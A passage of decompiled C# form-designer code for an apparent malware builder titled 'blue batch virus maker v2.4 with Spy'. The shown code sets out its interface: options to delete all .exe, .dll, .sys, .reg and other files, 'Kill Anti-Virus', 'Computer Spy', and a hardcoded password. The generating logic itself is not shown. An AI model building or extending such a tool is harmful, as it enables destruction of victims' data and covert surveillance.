this.Button47.BackColor = Color.Black; Button button47_1 = this.Button47; point1 = new Point(459, 135); Point point47 = point1; button47_1.Location = point47; this.Button47.Name = "Button47"; Button button47_2 = this.Button47; size1 = new Size(126, 23); Size size47 = size1; button47_2.Size = size47; this.Button47.TabIndex = 42; this.Button47.Text = "Delete All .jar"; this.Button47.UseVisualStyleBackColor = false; this.Button48.BackColor = Color.Black; Button button48_1 = this.Button48; point1 = new Point(459, 106); Point point48 = point1; button48_1.Location = point48; this.Button48.Name = "Button48"; Button button48_2 = this.Button48; size1 = new Size(126, 23); Size size48 = size1; button48_2.Size = size48; this.Button48.TabIndex = 41; this.Button48.Text = "Delete All .bfc"; this.Button48.UseVisualStyleBackColor = false; this.Button49.BackColor = Color.Black; Button button49_1 = this.Button49; point1 = new Point(459, 77); Point point49 = point1; button49_1.Location = point49; this.Button49.Name = "Button49"; Button button49_2 = this.Button49; size1 = new Size(126, 23); Size size49 = size1; button49_2.Size = size49; this.Button49.TabIndex = 40; this.Button49.Text = "Delete All .wav"; this.Button49.UseVisualStyleBackColor = false; this.Button50.BackColor = Color.Black; Button button50_1 = this.Button50; point1 = new Point(459, 48); Point point50 = point1; button50_1.Location = point50; this.Button50.Name = "Button50"; Button button50_2 = this.Button50; size1 = new Size(126, 23); Size size50 = size1; button50_2.Size = size50; this.Button50.TabIndex = 39; this.Button50.Text = "Delete All .sig"; this.Button50.UseVisualStyleBackColor = false; this.Button51.BackColor = Color.Black; Button button51_1 = this.Button51; point1 = new Point(459, 19); Point point51 = point1; button51_1.Location = point51; this.Button51.Name = "Button51"; Button button51_2 = this.Button51; size1 = new Size(126, 23); Size size51 = size1; button51_2.Size = size51; this.Button51.TabIndex = 38; this.Button51.Text = "Delete all .lng"; this.Button51.UseVisualStyleBackColor = false; this.Button52.BackColor = Color.Black; this.Button52.ForeColor = Color.Lime; Button button52_1 = this.Button52; point1 = new Point(312, 278); Point point52 = point1; button52_1.Location = point52; this.Button52.Name = "Button52"; Button button52_2 = this.Button52; size1 = new Size(145, 23); Size size52 = size1; button52_2.Size = size52; this.Button52.TabIndex = 37; this.Button52.Text = "Delete all .sys"; this.Button52.UseVisualStyleBackColor = false; this.Button53.BackColor = Color.Black; this.Button53.ForeColor = Color.Lime; Button button53_1 = this.Button53; point1 = new Point(312, 249); Point point53 = point1; button53_1.Location = point53; this.Button53.Name = "Button53"; Button button53_2 = this.Button53; size1 = new Size(145, 23); Size size53 = size1; button53_2.Size = size53; this.Button53.TabIndex = 36; this.Button53.Text = "Delete all .dat"; this.Button53.UseVisualStyleBackColor = false; this.Button54.BackColor = Color.Black; this.Button54.ForeColor = Color.Lime; Button button54_1 = this.Button54; point1 = new Point(312, 220); Point point54 = point1; button54_1.Location = point54; this.Button54.Name = "Button54"; Button button54_2 = this.Button54; size1 = new Size(145, 23); Size size54 = size1; button54_2.Size = size54; this.Button54.TabIndex = 35; this.Button54.Text = "Delete all .css"; this.Button54.UseVisualStyleBackColor = false; this.Button55.BackColor = Color.Black; this.Button55.ForeColor = Color.Lime; Button button55_1 = this.Button55; point1 = new Point(312, 191); Point point55 = point1; button55_1.Location = point55; this.Button55.Name = "Button55"; Button button55_2 = this.Button55; size1 = new Size(145, 23); Size size55 = size1; button55_2.Size = size55; this.Button55.TabIndex = 34; this.Button55.Text = "Delete all .png"; this.Button55.UseVisualStyleBackColor = false; this.Button56.BackColor = Color.Black; this.Button56.ForeColor = Color.Lime; Button button56_1 = this.Button56; point1 = new Point(312, 164); Point point56 = point1; button56_1.Location = point56; this.Button56.Name = "Button56"; Button button56_2 = this.Button56; size1 = new Size(145, 23); Size size56 = size1; button56_2.Size = size56; this.Button56.TabIndex = 33; this.Button56.Text = "Delete All .h"; this.Button56.UseVisualStyleBackColor = false; this.Button40.BackColor = Color.Black; Button button40_1 = this.Button40; point1 = new Point(161, 278); Point point57 = point1; button40_1.Location = point57; this.Button40.Name = "Button40"; Button button40_2 = this.Button40; size1 = new Size(145, 23); Size size57 = size1; button40_2.Size = size57; this.Button40.TabIndex = 27; this.Button40.Text = "Delete All .jpg"; this.Button40.UseVisualStyleBackColor = false; this.Button41.BackColor = Color.Black; Button button41_1 = this.Button41; point1 = new Point(161, 249); Point point58 = point1; button41_1.Location = point58; this.Button41.Name = "Button41"; Button button41_2 = this.Button41; size1 = new Size(145, 23); Size size58 = size1; button41_2.Size = size58; this.Button41.TabIndex = 26; this.Button41.Text = "Delete All .reg"; this.Button41.UseVisualStyleBackColor = false; this.Button38.BackColor = Color.Black; Button button38_1 = this.Button38; point1 = new Point(161, 222); Point point59 = point1; button38_1.Location = point59; this.Button38.Name = "Button38"; Button button38_2 = this.Button38; size1 = new Size(145, 23); Size size59 = size1; button38_2.Size = size59; this.Button38.TabIndex = 25; this.Button38.Text = "Delete All .bmp"; this.Button38.UseVisualStyleBackColor = false; this.Button39.BackColor = Color.Black; Button button39_1 = this.Button39; point1 = new Point(161, 193); Point point60 = point1; button39_1.Location = point60; this.Button39.Name = "Button39"; Button button39_2 = this.Button39; size1 = new Size(145, 23); Size size60 = size1; button39_2.Size = size60; this.Button39.TabIndex = 24; this.Button39.Text = "Delete All .log"; this.Button39.UseVisualStyleBackColor = false; this.Button37.BackColor = Color.Black; Button button37_1 = this.Button37; point1 = new Point(161, 164); Point point61 = point1; button37_1.Location = point61; this.Button37.Name = "Button37"; Button button37_2 = this.Button37; size1 = new Size(145, 23); Size size61 = size1; button37_2.Size = size61; this.Button37.TabIndex = 23; this.Button37.Text = "Delete All .dll"; this.Button37.UseVisualStyleBackColor = false; this.Button36.BackColor = Color.Black; Button button36_1 = this.Button36; point1 = new Point(161, 135); Point point62 = point1; button36_1.Location = point62; this.Button36.Name = "Button36"; Button button36_2 = this.Button36; size1 = new Size(145, 23); Size size62 = size1; button36_2.Size = size62; this.Button36.TabIndex = 22; this.Button36.Text = "Delete All .msi"; this.Button36.UseVisualStyleBackColor = false; this.Button34.BackColor = Color.Black; Button button34_1 = this.Button34; point1 = new Point(161, 106); Point point63 = point1; button34_1.Location = point63; this.Button34.Name = "Button34"; Button button34_2 = this.Button34; size1 = new Size(145, 23); Size size63 = size1; button34_2.Size = size63; this.Button34.TabIndex = 21; this.Button34.Text = "Delete All .ini"; this.Button34.UseVisualStyleBackColor = false; this.Button35.BackColor = Color.Black; Button button35_1 = this.Button35; point1 = new Point(161, 77); Point point64 = point1; button35_1.Location = point64; this.Button35.Name = "Button35"; Button button35_2 = this.Button35; size1 = new Size(145, 23); Size size64 = size1; button35_2.Size = size64; this.Button35.TabIndex = 20; this.Button35.Text = "Delete All .java"; this.Button35.UseVisualStyleBackColor = false; this.Button33.BackColor = Color.Black; Button button33_1 = this.Button33; point1 = new Point(161, 48); Point point65 = point1; button33_1.Location = point65; this.Button33.Name = "Button33"; Button button33_2 = this.Button33; size1 = new Size(145, 23); Size size65 = size1; button33_2.Size = size65; this.Button33.TabIndex = 19; this.Button33.Text = "Delete All .js"; this.Button33.UseVisualStyleBackColor = false; this.Button32.BackColor = Color.Black; Button button32_1 = this.Button32; point1 = new Point(161, 19); Point point66 = point1; button32_1.Location = point66; this.Button32.Name = "Button32"; Button button32_2 = this.Button32; size1 = new Size(145, 23); Size size66 = size1; button32_2.Size = size66; this.Button32.TabIndex = 18; this.Button32.Text = "Delete all .ico"; this.Button32.UseVisualStyleBackColor = false; this.Button31.BackColor = Color.Black; this.Button31.ForeColor = Color.Lime; Button button31_1 = this.Button31; point1 = new Point(14, 278); Point point67 = point1; button31_1.Location = point67; this.Button31.Name = "Button31"; Button button31_2 = this.Button31; size1 = new Size(145, 23); Size size67 = size1; button31_2.Size = size67; this.Button31.TabIndex = 17; this.Button31.Text = "Delete all .bat"; this.Button31.UseVisualStyleBackColor = false; this.Button29.BackColor = Color.Black; this.Button29.ForeColor = Color.Lime; Button button29_1 = this.Button29; point1 = new Point(14, 249); Point point68 = point1; button29_1.Location = point68; this.Button29.Name = "Button29"; Button button29_2 = this.Button29; size1 = new Size(145, 23); Size size68 = size1; button29_2.Size = size68; this.Button29.TabIndex = 16; this.Button29.Text = "Delete all .rar"; this.Button29.UseVisualStyleBackColor = false; this.Button28.BackColor = Color.Black; this.Button28.ForeColor = Color.Lime; Button button28_1 = this.Button28; point1 = new Point(14, 220); Point point69 = point1; button28_1.Location = point69; this.Button28.Name = "Button28"; Button button28_2 = this.Button28; size1 = new Size(145, 23); Size size69 = size1; button28_2.Size = size69; this.Button28.TabIndex = 15; this.Button28.Text = "Delete all .html"; this.Button28.UseVisualStyleBackColor = false; this.Button27.BackColor = Color.Black; this.Button27.ForeColor = Color.Lime; Button button27_1 = this.Button27; point1 = new Point(14, 191); Point point70 = point1; button27_1.Location = point70; this.Button27.Name = "Button27"; Button button27_2 = this.Button27; size1 = new Size(145, 23); Size size70 = size1; button27_2.Size = size70; this.Button27.TabIndex = 14; this.Button27.Text = "Delete all .vbs"; this.Button27.UseVisualStyleBackColor = false; this.Button26.BackColor = Color.Black; this.Button26.ForeColor = Color.Lime; Button button26_1 = this.Button26; point1 = new Point(14, 164); Point point71 = point1; button26_1.Location = point71; this.Button26.Name = "Button26"; Button button26_2 = this.Button26; size1 = new Size(145, 23); Size size71 = size1; button26_2.Size = size71; this.Button26.TabIndex = 13; this.Button26.Text = "Delete All .exe "; this.Button26.UseVisualStyleBackColor = false; this.Button24.BackColor = Color.Black; this.Button24.ForeColor = Color.Lime; Button button24_1 = this.Button24; point1 = new Point(14, 135); Point point72 = point1; button24_1.Location = point72; this.Button24.Name = "Button24"; Button button24_2 = this.Button24; size1 = new Size(145, 23); Size size72 = size1; button24_2.Size = size72; this.Button24.TabIndex = 11; this.Button24.Text = "Delete my music"; this.Button24.UseVisualStyleBackColor = false; this.RichTextBox2.BackColor = Color.Black; this.RichTextBox2.ForeColor = Color.Lime; RichTextBox richTextBox2_1 = this.RichTextBox2; point1 = new Point(8, 99); Point point73 = point1; richTextBox2_1.Location = point73; this.RichTextBox2.Name = "RichTextBox2"; RichTextBox richTextBox2_2 = this.RichTextBox2; size1 = new Size(339, 150); Size size73 = size1; richTextBox2_2.Size = size73; this.RichTextBox2.TabIndex = 14; this.RichTextBox2.Text = componentResourceManager.GetString("RichTextBox2.Text"); this.RichTextBox2.Visible = false; this.Button30.BackColor = Color.Black; Button button30_1 = this.Button30; point1 = new Point(16, 253); Point point74 = point1; button30_1.Location = point74; this.Button30.Name = "Button30"; Button button30_2 = this.Button30; size1 = new Size(319, 23); Size size74 = size1; button30_2.Size = size74; this.Button30.TabIndex = 15; this.Button30.Text = "Save file"; this.Button30.UseVisualStyleBackColor = false; this.Button30.Visible = false; this.CheckBox2.AutoSize = true; this.CheckBox2.BackColor = Color.Black; this.CheckBox2.ForeColor = Color.Red; CheckBox checkBox2_1 = this.CheckBox2; point1 = new Point(8, 7); Point point75 = point1; checkBox2_1.Location = point75; this.CheckBox2.Name = "CheckBox2"; CheckBox checkBox2_2 = this.CheckBox2; size1 = new Size(158, 17); Size size75 = size1; checkBox2_2.Size = size75; this.CheckBox2.TabIndex = 16; this.CheckBox2.Text = "Enable Delete All File Types"; this.CheckBox2.UseVisualStyleBackColor = false; this.Button62.BackColor = Color.Black; this.Button62.ForeColor = Color.Red; Button button62_1 = this.Button62; point1 = new Point(16, 282); Point point76 = point1; button62_1.Location = point76; this.Button62.Name = "Button62"; Button button62_2 = this.Button62; size1 = new Size(319, 23); Size size76 = size1; button62_2.Size = size76; this.Button62.TabIndex = 6; this.Button62.Text = "Cancel"; this.Button62.UseVisualStyleBackColor = false; this.Button62.Visible = false; this.Label1.AutoSize = true; this.Label1.BackColor = Color.Transparent; this.Label1.Font = new Font("Microsoft Sans Serif", 11.25f, FontStyle.Bold | FontStyle.Italic, GraphicsUnit.Point, (byte) 0); this.Label1.ForeColor = Color.Blue; Label label1_1 = this.Label1; point1 = new Point(632, 3); Point point77 = point1; label1_1.Location = point77; this.Label1.Name = "Label1"; Label label1_2 = this.Label1; size1 = new Size(82, 18); Size size77 = size1; label1_2.Size = size77; this.Label1.TabIndex = 21; this.Label1.Text = "Loading..."; this.Timer1.Enabled = true; this.Timer1.Interval = 10; this.CheckBox1.AutoSize = true; this.CheckBox1.BackColor = Color.Transparent; this.CheckBox1.ForeColor = Color.Red; CheckBox checkBox1_1 = this.CheckBox1; point1 = new Point(856, 3); Point point78 = point1; checkBox1_1.Location = point78; this.CheckBox1.Name = "CheckBox1"; CheckBox checkBox1_2 = this.CheckBox1; size1 = new Size(90, 17); Size size78 = size1; checkBox1_2.Size = size78; this.CheckBox1.TabIndex = 22; this.CheckBox1.Text = "Disable clock"; this.CheckBox1.UseVisualStyleBackColor = false; this.CheckBox3.AutoSize = true; this.CheckBox3.BackColor = Color.Black; this.CheckBox3.ForeColor = Color.Red; CheckBox checkBox3_1 = this.CheckBox3; point1 = new Point(241, 7); Point point79 = point1; checkBox3_1.Location = point79; this.CheckBox3.Name = "CheckBox3"; CheckBox checkBox3_2 = this.CheckBox3; size1 = new Size(86, 17); Size size79 = size1; checkBox3_2.Size = size79; this.CheckBox3.TabIndex = 23; this.CheckBox3.Text = "Kill Anti-Virus"; this.CheckBox3.UseVisualStyleBackColor = false; this.Button64.BackColor = Color.Black; this.Button64.ForeColor = Color.Lime; Button button64_1 = this.Button64; point1 = new Point(185, 495); Point point80 = point1; button64_1.Location = point80; this.Button64.Name = "Button64"; Button button64_2 = this.Button64; size1 = new Size(164, 23); Size size80 = size1; button64_2.Size = size80; this.Button64.TabIndex = 24; this.Button64.Text = "Save As .txt"; this.Button64.UseVisualStyleBackColor = false; this.Panel1.BackColor = Color.FromArgb(64, 64, 64); this.Panel1.Controls.Add((Control) this.CheckBox3); this.Panel1.Controls.Add((Control) this.CheckBox2); Panel panel1_1 = this.Panel1; point1 = new Point(8, 63); Point point81 = point1; panel1_1.Location = point81; this.Panel1.Name = "Panel1"; Panel panel1_2 = this.Panel1; size1 = new Size(339, 33); Size size81 = size1; panel1_2.Size = size81; this.Panel1.TabIndex = 25; this.TextBox1.BackColor = Color.Black; this.TextBox1.ForeColor = Color.Aqua; TextBox textBox1_1 = this.TextBox1; point1 = new Point(8, 37); Point point82 = point1; textBox1_1.Location = point82; this.TextBox1.Multiline = true; this.TextBox1.Name = "TextBox1"; this.TextBox1.ReadOnly = true; TextBox textBox1_2 = this.TextBox1; size1 = new Size(339, 20); Size size82 = size1; textBox1_2.Size = size82; this.TextBox1.TabIndex = 27; this.TextBox1.Text = "password when changed = 23097008946757"; this.TextBox1.TextAlign = HorizontalAlignment.Center; this.Label4.AutoSize = true; this.Label4.BackColor = Color.Black; this.Label4.Font = new Font("Microsoft Sans Serif", 12f, FontStyle.Regular, GraphicsUnit.Point, (byte) 0); this.Label4.ForeColor = Color.Yellow; Label label4_1 = this.Label4; point1 = new Point(462, 18); Point point83 = point1; label4_1.Location = point83; this.Label4.Name = "Label4"; Label label4_2 = this.Label4; size1 = new Size(128, 20); Size size83 = size1; label4_2.Size = size83; this.Label4.TabIndex = 29; this.Label4.Tag = (object) ""; this.Label4.Text = "Local Ip Address"; this.Label5.AutoSize = true; this.Label5.BackColor = Color.Black; this.Label5.Font = new Font("Microsoft Sans Serif", 9.75f, FontStyle.Bold, GraphicsUnit.Point, (byte) 0); this.Label5.ForeColor = Color.Red; Label label5_1 = this.Label5; point1 = new Point(5, 13); Point point84 = point1; label5_1.Location = point84; this.Label5.Name = "Label5"; Label label5_2 = this.Label5; size1 = new Size(119, 16); Size size84 = size1; label5_2.Size = size84; this.Label5.TabIndex = 30; this.Label5.Text = "Computer Name"; this.Label6.AutoSize = true; this.Label6.BackColor = Color.Black; this.Label6.Font = new Font("Microsoft Sans Serif", 11.25f, FontStyle.Bold, GraphicsUnit.Point, (byte) 0); this.Label6.ForeColor = Color.White; Label label6_1 = this.Label6; point1 = new Point(377, 20); Point point85 = point1; label6_1.Location = point85; this.Label6.Name = "Label6"; Label label6_2 = this.Label6; size1 = new Size(90, 18); Size size85 = size1; label6_2.Size = size85; this.Label6.TabIndex = 31; this.Label6.Text = "Defult Ip = "; this.Button65.BackColor = Color.Black; this.Button65.ForeColor = Color.Yellow; Button button65_1 = this.Button65; point1 = new Point(8, 446); Point point86 = point1; button65_1.Location = point86; this.Button65.Name = "Button65"; Button button65_2 = this.Button65; size1 = new Size(166, 23); Size size86 = size1; button65_2.Size = size86; this.Button65.TabIndex = 32; this.Button65.Text = "Computer Spy"; this.Button65.UseVisualStyleBackColor = false; this.Button66.BackColor = Color.Black; Button button66_1 = this.Button66; point1 = new Point(178, 446); Point point87 = point1; button66_1.Location = point87; this.Button66.Name = "Button66"; Button button66_2 = this.Button66; size1 = new Size(169, 23); Size size87 = size1; button66_2.Size = size87; this.Button66.TabIndex = 33; this.Button66.Text = "Created By"; this.Button66.UseVisualStyleBackColor = false; this.Label2.AutoSize = true; this.Label2.BackColor = Color.Black; this.Label2.Font = new Font("Microsoft Sans Serif", 9.75f, FontStyle.Regular, GraphicsUnit.Point, (byte) 0); this.Label2.ForeColor = Color.Fuchsia; Label label2_1 = this.Label2; point1 = new Point(305, 18); Point point88 = point1; label2_1.Location = point88; this.Label2.Name = "Label2"; Label label2_2 = this.Label2; size1 = new Size(15, 16); Size size88 = size1; label2_2.Size = size88; this.Label2.TabIndex = 34; this.Label2.Text = "0"; this.Label3.AutoSize = true; this.Label3.BackColor = Color.Black; this.Label3.Font = new Font("Microsoft Sans Serif", 9.75f, FontStyle.Regular, GraphicsUnit.Point, (byte) 0); Label label3_1 = this.Label3; point1 = new Point(225, 16); Point point89 = point1; label3_1.Location = point89; this.Label3.Name = "Label3"; Label label3_2 = this.Label3; size1 = new Size(84, 16); Size size89 = size1; label3_2.Size = size89; this.Label3.TabIndex = 35; this.Label3.Text = "searching ip "; this.AutoScaleDimensions = new SizeF(6f, 13f); this.AutoScaleMode = AutoScaleMode.Font; this.BackColor = Color.White; this.BackgroundImage = (Image) componentResourceManager.GetObject("$this.BackgroundImage"); this.BackgroundImageLayout = ImageLayout.Stretch; size1 = new Size(958, 521); this.ClientSize = size1; this.Controls.Add((Control) this.Label3); this.Controls.Add((Control) this.Label2); this.Controls.Add((Control) this.Button66); this.Controls.Add((Control) this.Button65); this.Controls.Add((Control) this.Label6); this.Controls.Add((Control) this.Label5); this.Controls.Add((Control) this.Label4); this.Controls.Add((Control) this.TextBox1); this.Controls.Add((Control) this.Panel1); this.Controls.Add((Control) this.Button64); this.Controls.Add((Control) this.CheckBox1); this.Controls.Add((Control) this.Label1); this.Controls.Add((Control) this.Button62); this.Controls.Add((Control) this.Button30); this.Controls.Add((Control) this.RichTextBox2); this.Controls.Add((Control) this.GroupBox4); this.Controls.Add((Control) this.GroupBox3); this.Controls.Add((Control) this.GroupBox2); this.Controls.Add((Control) this.GroupBox1); this.Controls.Add((Control) this.Button4); this.Controls.Add((Control) this.Button3); this.Controls.Add((Control) this.Button2); this.Controls.Add((Control) this.Button1); this.Controls.Add((Control) this.RichTextBox1); this.ForeColor = Color.Lime; this.Icon = (Icon) componentResourceManager.GetObject("$this.Icon"); this.Name = nameof (batch_maker); this.StartPosition = FormStartPosition.CenterScreen; this.Text = "blue batch virus maker v2.4 with Spy"; this.GroupBox1.ResumeLayout(false); this.GroupBox2.ResumeLayout(false); this.GroupBox3.ResumeLayout(false); this.GroupBox4.ResumeLayout(false); this.Panel1.ResumeLayout(false); this.Panel1.PerformLayout(); this.ResumeLayout(false); this.PerformLayout(); } internal virtual RichTextBox RichTextBox1 { [DebuggerNonUserCode] get => this._RichTextBox1; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.RichTextBox1_TextChanged); if (this._RichTextBox1 != null) this._RichTextBox1.TextChanged -= eventHandler; this._RichTextBox1 = value; if (this._RichTextBox1 == null) return; this._RichTextBox1.TextChanged += eventHandler; } } internal virtual Button Button1 { [DebuggerNonUserCode] get => this._Button1; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button1_Click); if (this._Button1 != null) this._Button1.Click -= eventHandler; this._Button1 = value; if (this._Button1 == null) return; this._Button1.Click += eventHandler; } } internal virtual Button Button2 { [DebuggerNonUserCode] get => this._Button2; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button2_Click); if (this._Button2 != null) this._Button2.Click -= eventHandler; this._Button2 = value; if (this._Button2 == null) return; this._Button2.Click += eventHandler; } } internal virtual Button Button3 { [DebuggerNonUserCode] get => this._Button3; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button3_Click); if (this._Button3 != null) this._Button3.Click -= eventHandler; this._Button3 = value; if (this._Button3 == null) return; this._Button3.Click += eventHandler; } } internal virtual Button Button4 { [DebuggerNonUserCode] get => this._Button4; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button4_Click); if (this._Button4 != null) this._Button4.Click -= eventHandler; this._Button4 = value; if (this._Button4 == null) return; this._Button4.Click += eventHandler; } } internal virtual GroupBox GroupBox1 { [DebuggerNonUserCode] get => this._GroupBox1; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.GroupBox1_Enter); if (this._GroupBox1 != null) this._GroupBox1.Enter -= eventHandler; this._GroupBox1 = value; if (this._GroupBox1 == null) return; this._GroupBox1.Enter += eventHandler; } } internal virtual Button Button9 { [DebuggerNonUserCode] get => this._Button9; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button9_Click); if (this._Button9 != null) this._Button9.Click -= eventHandler; this._Button9 = value; if (this._Button9 == null) return; this._Button9.Click += eventHandler; } } internal virtual Button Button7 { [DebuggerNonUserCode] get => this._Button7; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button7_Click); if (this._Button7 != null) this._Button7.Click -= eventHandler; this._Button7 = value; if (this._Button7 == null) return; this._Button7.Click += eventHandler; } } internal virtual Button Button6 { [DebuggerNonUserCode] get => this._Button6; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button6_Click); if (this._Button6 != null) this._Button6.Click -= eventHandler; this._Button6 = value; if (this._Button6 == null) return; this._Button6.Click += eventHandler; } } internal virtual Button Button5 { [DebuggerNonUserCode] get => this._Button5; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button5_Click); if (this._Button5 != null) this._Button5.Click -= eventHandler; this._Button5 = value; if (this._Button5 == null) return; this._Button5.Click += eventHandler; } } internal virtual Button Button10 { [DebuggerNonUserCode] get => this._Button10; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button10_Click); if (this._Button10 != null) this._Button10.Click -= eventHandler; this._Button10 = value; if (this._Button10 == null) return; this._Button10.Click += eventHandler; } } internal virtual Button Button11 { [DebuggerNonUserCode] get => this._Button11; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button11_Click); if (this._Button11 != null) this._Button11.Click -= eventHandler; this._Button11 = value; if (this._Button11 == null) return; this._Button11.Click += eventHandler; } } internal virtual Button Button12 { [DebuggerNonUserCode] get => this._Button12; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button12_Click); if (this._Button12 != null) this._Button12.Click -= eventHandler; this._Button12 = value; if (this._Button12 == null) return; this._Button12.Click += eventHandler; } } internal virtual Button Button13 { [DebuggerNonUserCode] get => this._Button13; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button13_Click); if (this._Button13 != null) this._Button13.Click -= eventHandler; this._Button13 = value; if (this._Button13 == null) return; this._Button13.Click += eventHandler; } } internal virtual Button Button14 { [DebuggerNonUserCode] get => this._Button14; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button14_Click); if (this._Button14 != null) this._Button14.Click -= eventHandler; this._Button14 = value; if (this._Button14 == null) return; this._Button14.Click += eventHandler; } } internal virtual Button Button15 { [DebuggerNonUserCode] get => this._Button15; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button15_Click); if (this._Button15 != null) this._Button15.Click -= eventHandler; this._Button15 = value; if (this._Button15 == null) return; this._Button15.Click += eventHandler; } } internal virtual GroupBox GroupBox2 { [DebuggerNonUserCode] get => this._GroupBox2; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._GroupBox2 = value; } internal virtual Button Button16 { [DebuggerNonUserCode] get => this._Button16; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button16_Click_1); if (this._Button16 != null) this._Button16.Click -= eventHandler; this._Button16 = value; if (this._Button16 == null) return; this._Button16.Click += eventHandler; } } internal virtual GroupBox GroupBox3 { [DebuggerNonUserCode] get => this._GroupBox3; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._GroupBox3 = value; } internal virtual Button Button21 { [DebuggerNonUserCode] get => this._Button21; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button21_Click); if (this._Button21 != null) this._Button21.Click -= eventHandler; this._Button21 = value; if (this._Button21 == null) return; this._Button21.Click += eventHandler; } } internal virtual Button Button20 { [DebuggerNonUserCode] get => this._Button20; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button20_Click); if (this._Button20 != null) this._Button20.Click -= eventHandler; this._Button20 = value; if (this._Button20 == null) return; this._Button20.Click += eventHandler; } } internal virtual Button Button19 { [DebuggerNonUserCode] get => this._Button19; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button19_Click); if (this._Button19 != null) this._Button19.Click -= eventHandler; this._Button19 = value; if (this._Button19 == null) return; this._Button19.Click += eventHandler; } } internal virtual Button Button18 { [DebuggerNonUserCode] get => this._Button18; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button18_Click); if (this._Button18 != null) this._Button18.Click -= eventHandler; this._Button18 = value; if (this._Button18 == null) return; this._Button18.Click += eventHandler; } } internal virtual Button Button23 { [DebuggerNonUserCode] get => this._Button23; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button23_Click); if (this._Button23 != null) this._Button23.Click -= eventHandler; this._Button23 = value; if (this._Button23 == null) return; this._Button23.Click += eventHandler; } } internal virtual Button Button22 { [DebuggerNonUserCode] get => this._Button22; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button22_Click); if (this._Button22 != null) this._Button22.Click -= eventHandler; this._Button22 = value; if (this._Button22 == null) return; this._Button22.Click += eventHandler; } } internal virtual GroupBox GroupBox4 { [DebuggerNonUserCode] get => this._GroupBox4; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._GroupBox4 = value; } internal virtual Button Button29 { [DebuggerNonUserCode] get => this._Button29; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button29_Click); if (this._Button29 != null) this._Button29.Click -= eventHandler; this._Button29 = value; if (this._Button29 == null) return; this._Button29.Click += eventHandler; } } internal virtual Button Button28 { [DebuggerNonUserCode] get => this._Button28; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button28_Click); if (this._Button28 != null) this._Button28.Click -= eventHandler; this._Button28 = value; if (this._Button28 == null) return; this._Button28.Click += eventHandler; } } internal virtual Button Button27 { [DebuggerNonUserCode] get => this._Button27; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button27_Click); if (this._Button27 != null) this._Button27.Click -= eventHandler; this._Button27 = value; if (this._Button27 == null) return; this._Button27.Click += eventHandler; } } internal virtual Button Button26 { [DebuggerNonUserCode] get => this._Button26; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button26_Click); if (this._Button26 != null) this._Button26.Click -= eventHandler; this._Button26 = value; if (this._Button26 == null) return; this._Button26.Click += eventHandler; } } internal virtual Button Button25 { [DebuggerNonUserCode] get => this._Button25; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler1 = new EventHandler(this.Button25_Click); EventHandler eventHandler2 = new EventHandler(this.Button25_MouseLeave); if (this._Button25 != null) { this._Button25.Click -= eventHandler1; this._Button25.MouseLeave -= eventHandler2; } this._Button25 = value; if (this._Button25 == null) return; this._Button25.Click += eventHandler1; this._Button25.MouseLeave += eventHandler2; } } internal virtual Button Button24 { [DebuggerNonUserCode] get => this._Button24; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Button24_Click_1); if (this._Button24 != null) this._Button24.Click -= eventHandler; this._Button24 = value; if (this._Button24 == null) return; this._Button24.Click += 